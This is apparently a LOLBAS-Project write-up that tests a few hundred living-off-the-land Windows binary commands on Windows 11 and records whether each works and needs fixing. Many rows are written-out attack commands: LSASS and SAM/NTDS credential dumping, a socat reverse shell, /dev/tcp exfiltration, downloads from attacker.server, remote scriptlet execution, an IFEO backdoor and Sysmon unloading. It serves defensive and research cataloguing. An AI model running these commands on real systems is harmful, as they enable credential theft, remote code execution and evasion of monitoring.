LOLBAS
LOLBAS copied to clipboard
Published
20 hours ago •
LOLBAS-Project
LOLBAS-Project
Windows 11 sprint
Using 7b208e8021a935b39edd58cc2996595c0135f722 as a base, I have checked all LOLBAS entries on a default installation on Windows 11 (21H2). As you might expect, most entries that worked on Windows 10 still work on Windows 11. Whilst going over all entries, a couple of issues were found - see the last two columns of the below table.
Please scroll to the right to see the outcomes ➡️ ➡️ ➡️
| Entry | Command | Works on Windows 11? | Needs changing? | Comment |
|---|---|---|---|---|
| Shdocvw.dll | rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" |
✔️ | ||
| Url.dll | rundll32.exe url.dll,OpenURL "C:\test\calc.hta" |
✔️ | ||
| Url.dll | rundll32.exe url.dll,OpenURL "C:\test\calc.url" |
✔️ | ⚠️️ | Opens edge, requires user interaction to open calc |
| Url.dll | rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e |
✔️ | ||
| Url.dll | rundll32.exe url.dll,FileProtocolHandler calc.exe |
✔️ | ||
| Url.dll | rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e |
✔️ | ||
| Url.dll | rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta |
✔️ | ||
| Zipfldr.dll | rundll32.exe zipfldr.dll,RouteTheCall calc.exe |
✔️ | ||
| Zipfldr.dll | rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e |
✔️ | ||
| Advpack.dll | rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, |
✔️ | ||
| Advpack.dll | rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, |
✔️ | ⚠️️ | Admin required |
| Advpack.dll | rundll32.exe advpack.dll,RegisterOCX test.dll |
✔️ | ||
| Advpack.dll | rundll32.exe advpack.dll,RegisterOCX calc.exe |
✔️ | ||
| Advpack.dll | rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
✔️ | ||
| Setupapi.dll | rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf |
✔️ | ||
| Setupapi.dll | rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf |
✔️ | ||
| Ieadvpack.dll | rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, |
✔️ | ||
| Ieadvpack.dll | rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, |
✔️ | ⚠️️ | Admin required |
| Ieadvpack.dll | rundll32.exe ieadvpack.dll,RegisterOCX test.dll |
✔️ | ||
| Ieadvpack.dll | rundll32.exe ieadvpack.dll,RegisterOCX calc.exe |
✔️ | ||
| Ieadvpack.dll | rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
✔️ | ||
| Comsvcs.dll | rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full" |
✔️ | ⚠️️ | Requires PowerShell for some reason? Only worked for me when I prefixed with powershell /c … |
| Mshtml.dll | rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" |
✔️ | Requires GUI interaction to open/load HTA | |
| Shell32.dll | rundll32.exe shell32.dll,Control_RunDLL payload.dll |
✔️ | ⚠️️ | Full path (e.g. c:\path\to\payload) required |
| Shell32.dll | rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe |
✔️ | ||
| Shell32.dll | rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" |
✔️ | ||
| Syssetup.dll | rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf |
✔️ | ||
| Syssetup.dll | rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf |
✔️ | ||
| Ieaframe.dll | rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" |
✔️ | ||
| Pcwutl.dll | rundll32.exe pcwutl.dll,LaunchApplication calc.exe |
✔️ | ||
| Dfshim.dll | rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo |
Not tested | ||
| CL_LoadAssembly.ps1 | ”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun() |
✔️ | Redundant quote at start of command; -ep bypass needed; Requires .NET DLL |
|
| CL_Mutexverifiers.ps1 | . C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1 |
Not tested | May be Windows 10 only? Could not find file. | |
| winrm.vbs | winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985 |
✔️ | ||
| winrm.vbs | winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985 |
✔️ | ⚠️️ | Two commands; former requires admin |
| winrm.vbs | %SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty |
✔️ | ⚠️️ | Description update needed – doesn’t involve XSL? |
| Pubprn.vbs | pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct |
❌ | Error | |
| Manage-bde.wsf | set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf |
✔️ | ||
| Manage-bde.wsf | copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf |
✔️ | ||
| Syncappvpublishingserver.vbs | SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" |
❌ | Nothing happens. | |
| UtilityFunctions.ps1 | powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()” |
✔️ | ⚠️️ | -ep bypass needed |
| Pester.bat | Pester.bat [/help|?|-?|/?] "$null; notepad" |
✔️ | ||
| CL_Invocation.ps1 | . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke <executable> [args] |
Not tested | May be Windows 10 only? Could not find file. | |
| Mmc.exe | mmc.exe -Embedding c:\path\to\test.msc |
❌ | Not sure why – seems to interpret GUID as URL. @bohops to the rescue? | |
| Mmc.exe | mmc.exe gpedit.msc |
✔️ | ||
| CertOC.exe | certoc.exe -LoadDLL "C:\test\calc.dll" |
Out of scope | Windows Server only. | |
| CertOC.exe | certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 |
Out of scope | Windows Server only. | |
| At.exe | C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe |
❌ | Deprecated – not accepted | |
| AppInstaller.exe | start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw |
✔️ | ||
| Makecab.exe | makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab |
✔️ | ||
| Makecab.exe | makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab |
✔️ | ||
| Makecab.exe | makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab |
✔️ | ||
| Bash.exe | bash.exe -c calc.exe |
Out of scope | Doesn't come out of the box | |
| Bash.exe | bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" |
Out of scope | Doesn't come out of the box | |
| Bash.exe | bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' |
Out of scope | Doesn't come out of the box | |
| Bash.exe | bash.exe -c calc.exe |
Out of scope | Doesn't come out of the box | |
| Odbcconf.exe | odbcconf -f file.rsp |
✔️ | ⚠️️ | Typo ‘Playloads’ |
| Odbcconf.exe | odbcconf /a {REGSVR c:\test\test.dll} |
✔️ | ||
| Ieexec.exe | ieexec.exe http://x.x.x.x:8080/bypass.exe |
❌ | File not present | |
| Ieexec.exe | ieexec.exe http://x.x.x.x:8080/bypass.exe |
❌ | File not present | |
| ConfigSecurityPolicy.exe | ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile |
❌ | Error message, does not reach out to server | |
| Findstr.exe | findstr /V /L W3AllLov3LolBas c:\ADS\file.exe > c:\ADS\file.txt:file.exe |
✔️ | ||
| Findstr.exe | findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe |
✔️ | ||
| Findstr.exe | findstr /S /I cpassword \\sysvol\policies\*.xml |
✔️ | ||
| Findstr.exe | findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe |
✔️ | ||
| Wsreset.exe | wsreset.exe |
✔️ | ||
| cmdl32.exe | cmdl32 /vpn /lan %cd%\config |
✔️ | ||
| Cmstp.exe | cmstp.exe /ni /s c:\cmstp\CorpVPN.inf |
✔️ | ||
| Cmstp.exe | cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf |
❌ | ||
| Xwizard.exe | xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} |
✔️ | ||
| Xwizard.exe | xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} |
✔️ | ||
| Xwizard.exe | xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM |
✔️ | ⚠️️ | Should be clearer about location (AppData/Local/Microsoft/Windows/InetCache/IE/{random} etc.) |
| Rasautou.exe | rasautou -d powershell.dll -p powershell -a a -e e |
❌ | Removed in Windows 10, as expected | |
| Regsvcs.exe | regsvcs.exe AllTheThingsx64.dll |
✔️ | ⚠️️ | Works without admin; Wrong path! |
| Regsvcs.exe | regsvcs.exe AllTheThingsx64.dll |
✔️ | ⚠️️ | Works without admin; Wrong path! |
| Msdt.exe | msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE |
✔️ | ||
| Msdt.exe | msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE |
✔️ | ||
| Pktmon.exe | pktmon.exe start --etw |
✔️ | ||
| Pktmon.exe | pktmon.exe filter add -p 445 |
✔️ | ||
| Microsoft.Workflow.Compiler.exe | Microsoft.Workflow.Compiler.exe tests.xml results.xml |
✔️ | ||
| Microsoft.Workflow.Compiler.exe | Microsoft.Workflow.Compiler.exe tests.txt results.txt |
✔️ | ||
| Microsoft.Workflow.Compiler.exe | Microsoft.Workflow.Compiler.exe tests.txt results.txt |
✔️ | ||
| PrintBrm.exe | PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip |
✔️ | Is a specially-formatted zip | |
| PrintBrm.exe | PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder |
✔️ | Requires a specially-formatted zip | |
| Regsvr32.exe | regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll |
✔️ | ||
| Regsvr32.exe | regsvr32.exe /s /u /i:file.sct scrobj.dll |
✔️ | ||
| Regsvr32.exe | regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll |
✔️ | ||
| Regsvr32.exe | regsvr32.exe /s /u /i:file.sct scrobj.dll |
✔️ | ||
| MpCmdRun.exe | MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe |
❌ | Patched in previous version of Defender | |
| MpCmdRun.exe | copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe |
❌ | Patched in previous version of Defender | |
| MpCmdRun.exe | MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe |
❌ | Patched in previous version of Defender | |
| Msconfig.exe | Msconfig.exe -5 |
❌ | Described XML not found | |
| Hh.exe | HH.exe http://some.url/script.ps1 |
✔️ | ⚠️️ | Wrong path; Requires user interaction to open/load PS1 file |
| Hh.exe | HH.exe c:\windows\system32\calc.exe |
✔️ | ⚠️️ | Wrong path; Requires user interaction to open calc |
| Cmd.exe | cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat |
✔️ | ||
| Cmd.exe | cmd.exe - < fakefile.doc:payload.bat |
✔️ | ||
| DataSvcUtil.exe | DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile |
❌ | ⚠️️ | Query string not allowed in URL, so ?encodedfile would be removed. But even then I couldn't get it to work - requires some special server response? |
| Control.exe | control.exe c:\windows\tasks\file.txt:evil.dll |
✔️ | ||
| Certutil.exe | certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe |
✔️ | ||
| Certutil.exe | certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe |
✔️ | ||
| Certutil.exe | certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt |
✔️ | ||
| Certutil.exe | certutil -encode inputFileName encodedOutputFileName |
✔️ | ||
| Certutil.exe | certutil -decode encodedInputFileName decodedOutputFileName |
✔️ | ||
| Certutil.exe | certutil --decodehex encoded_hexadecimal_InputFileName |
✔️ | ||
| Runonce.exe | Runonce.exe /AlternateShellStartup |
✔️ | ||
| Msbuild.exe | msbuild.exe pshell.xml |
✔️ | ||
| Msbuild.exe | msbuild.exe project.csproj |
✔️ | ||
| Msbuild.exe | msbuild.exe @sample.rsp |
❌ | ⚠️️ | I think a comment in #165 was misunderstood – RSPs can help to evade command-line-based detection, but cannot be used on their own to achieve e.g. execution |
| Msbuild.exe | msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo |
✔️ | ||
| Msbuild.exe | msbuild.exe project.proj |
✔️ | ||
| Cmdkey.exe | cmdkey /list |
✔️ | ||
| Regini.exe | regini.exe newfile.txt:hidden.ini |
✔️ | ||
| Rpcping.exe | rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM |
✔️ | ||
| Rpcping.exe | rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM |
✔️ | ||
| GfxDownloadWrapper.exe | C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" |
Out of scope | See issue #173 | |
| Schtasks.exe | schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe |
✔️ | ||
| Schtasks.exe | schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily |
✔️ | ||
| SettingSyncHost.exe | SettingSyncHost -LoadAndRunDiagScript anything |
Out of scope | ||
| SettingSyncHost.exe | SettingSyncHost -LoadAndRunDiagScriptNoCab anything |
Out of Scope | ||
| IMEWDBLD.exe | C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw |
✔️ | ||
| Jsc.exe | jsc.exe scriptfile.js |
✔️ | ||
| Jsc.exe | jsc.exe /t:library Library.js |
✔️ | ||
| wuauclt.exe | wuauclt.exe /UpdateDeploymentProvider <Full_Path_To_DLL> /RunHandlerComServer |
❌ | ⚠️️ | Maybe special format/entrypoints required? Also, <Full_Path_To_DLL> is rendered as an HTML tag on the website - should double check escaping again. |
| CertReq.exe | CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt |
✔️ | ||
| CertReq.exe | CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal |
✔️ | ||
| Wab.exe | wab.exe |
✔️ | ||
| Infdefaultinstall.exe | InfDefaultInstall.exe Infdefaultinstall.inf |
✔️ | ⚠️️ | Admin required |
| Csc.exe | csc.exe -out:My.exe File.cs |
✔️ | ||
| Csc.exe | csc -target:library File.cs |
✔️ | ||
| Atbroker.exe | ATBroker.exe /start malware |
✔️ | ||
| Aspnet_Compiler.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u |
✔️ | ||
| Register-cimprovider.exe | Register-cimprovider -path "C:\folder\evil.dll" |
✔️ | ||
| Bitsadmin.exe | bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 |
✔️ | ⚠️️ | Works* but different command: bitsadmin /transfer debjob /download /priority normal http://localhost:8000/runme.txt c:\windows\temp\test.txt; Ampersands also missing. |
| Bitsadmin.exe | bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 |
✔️ | ⚠️️ | Different command used: bitsadmin /transfer debjob /download /priority normal http://localhost:8000/runme.txt c:\windows\temp\test.txt |
| Bitsadmin.exe | bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset |
❌ | Ampersands also missing. | |
| Bitsadmin.exe | bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset |
❌ | ||
| Netsh.exe | netsh.exe add helper C:\Users\User\file.dll |
✔️ | ⚠️️ | Admin required |
| Msiexec.exe | msiexec /quiet /i cmd.msi |
✔️ | ||
| Msiexec.exe | msiexec /q /i http://192.168.100.3/tmp/cmd.png |
✔️ | Special Class: DLLRegisterServer | |
| Msiexec.exe | msiexec /y "C:\folder\evil.dll" |
✔️ | Special Class: DLLRegisterServer | |
| Msiexec.exe | msiexec /z "C:\folder\evil.dll" |
✔️ | Special Class: DLLRegisterServer | |
| Psr.exe | psr.exe /start /output D:\test.zip /sc 1 /gui 0 |
❌ | GUI doesn’t seem to work either | |
| Ilasm.exe | ilasm.exe C:\public\test.txt /exe |
✔️ | ||
| Ilasm.exe | ilasm.exe C:\public\test.txt /dll |
✔️ | ||
| Gpscript.exe | Gpscript /logon |
✔️ | ||
| Gpscript.exe | Gpscript /startup |
✔️ | ||
| Sc.exe | sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice |
✔️ | ⚠️️ | Incorrect slash |
| Sc.exe | sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing> |
✔️ | ||
| Reg.exe | reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg |
✔️ | ||
| Reg.exe | reg save HKLM\SECURITY c:\test\security.bak && reg save HKLM\SYSTEM c:\test\system.bak && reg save HKLM\SAM c:\test\sam.bak |
✔️ | ||
| Cscript.exe | cscript c:\ads\file.txt:script.vbs |
✔️ | ⚠️️ | Requires //e:vbscript |
| Scriptrunner.exe | Scriptrunner.exe -appvscript calc.exe |
✔️ | ||
| Scriptrunner.exe | ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" |
✔️ | GUI interaction required | |
| Finger.exe | finger [email protected] | more +2 | cmd |
✔️ | ||
| Dllhost.exe | dllhost.exe /Processid:{CLSID} |
❌ | ||
| Mavinject.exe | MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll |
✔️ | ||
| Mavinject.exe | Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" |
✔️ | ||
| Pcalua.exe | pcalua.exe -a calc.exe |
✔️ | ||
| Pcalua.exe | pcalua.exe -a \\server\payload.dll |
❌ | May require special class? | |
| Pcalua.exe | pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java |
✔️ | ||
| OfflineScannerShell.exe | OfflineScannerShell |
✔️ | ⚠️️ | Special structure required. However, isn’t this more DLL Sideloading than a lolbin? |
| Pcwrun.exe | Pcwrun.exe c:\temp\beacon.exe |
✔️ | ⚠️️ | Requires GUI interaction |
| Tttracer.exe | tttracer.exe C:\windows\system32\calc.exe |
✔️ | ||
| Tttracer.exe | TTTracer.exe -dumpFull -attach pid |
✔️ | ||
| Regasm.exe | regasm.exe AllTheThingsx64.dll |
✔️ | Requires RegisterClass function | |
| Regasm.exe | regasm.exe /U AllTheThingsx64.dll |
✔️ | Requires RegisterClass function | |
| Extrac32.exe | extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe |
✔️ | ||
| Extrac32.exe | extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe |
✔️ | ||
| Extrac32.exe | extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt |
✔️ | ||
| Extrac32.exe | extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe |
✔️ | ||
| Dnscmd.exe | dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll |
Out of scope | Windows Server only. | |
| Print.exe | print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe |
✔️ | ||
| Print.exe | print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe |
✔️ | ||
| Print.exe | print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe |
✔️ | ||
| Dfsvc.exe | rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo |
✔️ | User interaction required. | |
| Diskshadow.exe | diskshadow.exe /s c:\test\diskshadow.txt |
Out of scope | Windows Server only. | |
| Diskshadow.exe | diskshadow> exec calc.exe |
Out of scope | Windows Server only. | |
| fltMC.exe | fltMC.exe unload SysmonDrv |
✔️ | ||
| Expand.exe | expand \\webdav\folder\file.bat c:\ADS\file.bat |
✔️ | ||
| Expand.exe | expand c:\ADS\file1.bat c:\ADS\file2.bat |
✔️ | ||
| Expand.exe | expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
✔️ | ||
| Esentutl.exe | esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o |
✔️ | ||
| Esentutl.exe | esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o |
✔️ | ||
| Esentutl.exe | esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o |
✔️ | ||
| Esentutl.exe | esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o |
✔️ | ||
| Esentutl.exe | esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o |
✔️ | ||
| Esentutl.exe | esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit |
✔️ | ||
| Stordiag.exe | stordiag.exe |
✔️ | ⚠️️ | Requires moving – not a lolbin? |
| SyncAppvPublishingServer.exe | SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" |
❌ | Nothing happens | |
| Wmic.exe | wmic.exe process call create "c:\ads\file.txt:program.exe" |
✔️ | ||
| Wmic.exe | wmic.exe process call create calc |
✔️ | ||
| Wmic.exe | wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" |
✔️ | ⚠️️ | Just one of the many examples of what process call create can do - the calc example above should suffice, I'd remove this one |
| Wmic.exe | wmic.exe /node:"192.168.0.1" process call create "evil.exe" |
✔️ | ||
| Wmic.exe | wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" |
❌ | ⚠️️ | Just one of the many examples of what process call create can do - the calc example above should suffice, I'd remove this one |
| Wmic.exe | wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" |
❌ | ⚠️️ | Just one of the many examples of what process call create can do - the calc example above should suffice, I'd remove this one |
| Wmic.exe | wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" |
✔️ | ||
| Wmic.exe | wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" |
✔️ | ||
| OneDriveStandaloneUpdater.exe | OneDriveStandaloneUpdater |
Not tested | Could not be located (possibly not created due to having run ‘O&O ShutUp10++’ on my VM) | |
| Forfiles.exe | forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe |
✔️ | ||
| Forfiles.exe | forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" |
✔️ | ||
| Diantz.exe | diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab |
Out of scope | Windows Server only. | |
| Diantz.exe | diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab |
Out of scope | Windows Server only. | |
| Desktopimgdownldr.exe | set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr |
✔️ | ||
| Wscript.exe | wscript c:\ads\file.txt:script.vbs |
✔️ | ||
| Wscript.exe | echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js |
✔️ | ⚠️️ | Requires //e:vbscript |
| Ie4uinit.exe | ie4uinit.exe -BaseSettings |
✔️ | ||
| Verclsid.exe | verclsid.exe /S /C {CLSID} |
✔️ | ||
| Ttdinject.exe | TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe" |
✔️ | ||
| Ttdinject.exe | ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" |
❌ | But previous one works so not an issue | |
| Regedit.exe | regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey |
✔️ | ⚠️️ | Wrong path |
| Regedit.exe | regedit C:\ads\file.txt:regfile.reg |
✔️ | ⚠️️ | Wrong path |
| Eventvwr.exe | eventvwr.exe |
❌ | No longer working | |
| vbc.exe | vbc.exe /target:exe c:\temp\vbs\run.vb |
✔️ | ||
| vbc.exe | vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb |
✔️ | ⚠️️ | Contains template metadata |
| Explorer.exe | explorer.exe /root,"C:\Windows\System32\calc.exe" |
✔️ | ||
| Explorer.exe | explorer.exe C:\Windows\System32\notepad.exe |
✔️ | ||
| Installutil.exe | InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll |
✔️ | Requires .NET DLL with special format | |
| Installutil.exe | InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll |
✔️ | Requires .NET DLL with special format | |
| Extexport.exe | Extexport.exe c:\test foo bar |
✔️ | ||
| Rundll32.exe | rundll32.exe AllTheThingsx64,EntryPoint |
✔️ | ||
| Rundll32.exe | rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint |
✔️ | ||
| Rundll32.exe | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" |
✔️ | ⚠️️ | ) missing |
| Rundll32.exe | rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); |
✔️ | ||
| Rundll32.exe | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} |
✔️ | ||
| Rundll32.exe | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") |
✔️ | ||
| Rundll32.exe | rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain |
✔️ | ||
| Rundll32.exe | rundll32.exe -sta {CLSID} |
